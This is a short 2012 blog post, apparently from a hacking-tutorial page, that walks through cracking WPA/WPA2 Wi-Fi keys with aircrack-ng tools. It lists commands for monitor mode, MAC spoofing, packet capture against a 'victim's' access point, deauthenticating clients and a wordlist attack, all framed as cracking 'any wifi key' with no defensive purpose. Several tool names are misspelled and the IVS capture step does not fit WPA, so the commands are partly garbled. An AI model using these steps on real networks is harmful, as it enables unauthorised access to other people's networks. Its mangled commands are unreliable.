Wednesday 29 August 2012

How to Crack WiFi WPA/WPA2 Key

How to Crack WiFi WPA/WPA2 Key

In this tutorial i'll explain how to crack Wifi WPA/WPA2 key using Backtrack. This is step by step tutorial of cracking any wifi key. if face any problem during this process, u can share here your problem.
Before u start u need a Worldlist, which i pre installed in Backtrack. If it is not available u can ezly download from Google.

Lets Start :-
1. #airmon-ng
2. # airmon-ng start wlan0 *(wlan0 is your wireless network interface)
3. ifconfig mon0 down
4. macchanger -m 00:11:22:33:44:55 mon0
5. ifconfig mon0 up
6. airdump-ng mon0
7. airedump-ng -c 1 -w WapCrack --bssid xx:xx:xx:xx:xx:xx --ivs mon0
*(1=channel, WapCrack=file name, xx:xx:xx:xx:xx:xx= Victim's MAC
8. airoplay-ng -0 1 -e DE1E mon0
*(DE1E = ESSID)
9. aircrack-ng -w /root/Desktop/Worldlist.lst WapCrack.ivs

Now sit back and just wait, may b it take 1 hour to found key. After found key it shows:
Key Found : [ KEY_HERE]
Enter key and enjoy :)


www.facebook.com/e3CyberAcademy
www.facebook.com/e3CyberAcademy





!_Cra5h3R_!

2 comments: